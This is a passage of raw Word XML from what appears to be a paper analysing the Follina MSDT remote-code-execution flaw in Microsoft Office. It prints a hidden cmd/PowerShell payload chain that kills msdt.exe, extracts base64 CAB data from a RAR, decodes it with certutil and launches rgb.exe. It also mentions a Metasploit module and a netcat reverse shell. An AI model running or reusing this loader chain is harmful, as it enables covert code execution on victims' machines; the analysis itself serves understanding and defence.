      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>="c:\windows\system32\cmd.exe";</w:t>
      </w:r>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Start-Process $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>windowstyle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> hidden -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ArgumentList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> "/c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>taskkill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /f /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>im</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> msdt.exe";</w:t>
      </w:r>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Start-Process $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>windowstyle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> hidden -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ArgumentList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> "/c cd C:\users\public\&amp;&amp;for /r %temp% %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in (05-2022-0438.rar) do copy %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.rar /y&amp;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TVNDRgAAAA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.rar&gt;1.t&amp;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -decode 1.t 1.c &amp;&amp;expand 1.c -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>F:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> .&amp;&amp;rgb.exe";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAA0C7A" w14:textId="6E8E4DA5" w:rsidR="00D474EE" w:rsidRPr="0027035D" w:rsidRDefault="00D474EE" w:rsidP="00E115DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D474EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This file appears to have been sent as an email attachment in the original compressed archive or RAR format. An attacker would </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55544313" w14:textId="2BA03320" w:rsidR="00D474EE" w:rsidRPr="003907CB" w:rsidRDefault="00D474EE" w:rsidP="00E115DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the hidden Stage Command Prompt to stop any running instances of "msdt.exe." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B157A0C" w14:textId="77777777" w:rsidR="00D474EE" w:rsidRPr="003907CB" w:rsidRDefault="00D474EE" w:rsidP="00E115DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, it discovers a base64 string that appears to be the start of a compressed "CAB" file (Microsoft Cabinet File) in order to loop through this archive. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50757F01" w14:textId="77777777" w:rsidR="00D474EE" w:rsidRPr="003907CB" w:rsidRDefault="00D474EE" w:rsidP="00E115DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>This Base64 CAB file should be saved as 1.t, and the decoded CAB file should be saved as 1.c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F031E61" w14:textId="77777777" w:rsidR="00D474EE" w:rsidRPr="003907CB" w:rsidRDefault="00D474EE" w:rsidP="00E115DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Eventually, it would expand the 1.c CAB file to generate and launch a "rgb.exe." Since that this is remote code execution, the adversary can do anything they want at this time. That might be ransomware, a cryptocurrency miner, or a remote access Trojan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDCA207" w14:textId="238B588B" w:rsidR="00D474EE" w:rsidRPr="009001A3" w:rsidRDefault="00D474EE" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">This should have an impact on other Office products like Excel and PowerPoint using it as its vector. All it takes for threat actors to simply spray and pray over the internet in spear phishing campaigns and social engineering is for a person to open or even navigate to the document. This is straightforward to reproduce. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF90747" w14:textId="3731F081" w:rsidR="000B3A0B" w:rsidRPr="005F6209" w:rsidRDefault="009614D3" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidR="000B3A0B" w:rsidRPr="005F6209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Example illustration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F388922" w14:textId="57E2BF69" w:rsidR="00FD7AA2" w:rsidRPr="009001A3" w:rsidRDefault="00FD7AA2" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Researchers changed the base64 data in a Microsoft Word document's "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>document.xml.rels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>" file by substituting it with their own commands in order to replicate the vulnerability. They configured the document in a supervised sandbox environment to connect to a local IP. This enabled them to test the attack vector using Kali Linux as the attacker's computer on a local Windows 10 or Windows 11 virtual machine running Office 2019 or 2021. The configuration showed that the updated document would make contact with an HTTP server that hosted the amended HTML file, causing the execution of predefined actions, including opening notepad or calculator programs, or carrying out other proof-of-concept tasks. To finish the experiment, the file was saved in Rich Text Format (RTF).</w:t>
      </w:r>
      <w:r w:rsidR="009001A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>The exploit procedure can be automated by using a special Metasploit module (exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>fileformat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>word_msdtjs_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">) from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>mfsconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [10][11][13]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, or by combining it with a Python script that stages and creates the required steps along with a modified Microsoft Word document. The exploit can also be improved by forcing the victim to download a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD7AA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> program. This will allow a reverse shell to be sent back to the attacker's computer, allowing for complete user privileges breach of the device.</w:t>
      </w:r>
      <w:r w:rsidR="0035550F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519C8425" w14:textId="5BBF2698" w:rsidR="000B3A0B" w:rsidRPr="00302C3B" w:rsidRDefault="003157B2" w:rsidP="00F74841">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(Note: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE2765" w:rsidRPr="00302C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="000B3A0B" w:rsidRPr="00302C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000B3A0B" w:rsidRPr="00302C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> would trigger antivirus if Windows Defender were on the box or any other AV that might get in the way</w:t>
      </w:r>
      <w:r w:rsidRPr="00302C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000B3A0B" w:rsidRPr="00302C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50700F7B" w14:textId="7F31F3CA" w:rsidR="000B3A0B" w:rsidRPr="003907CB" w:rsidRDefault="009614D3" w:rsidP="007A6C87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
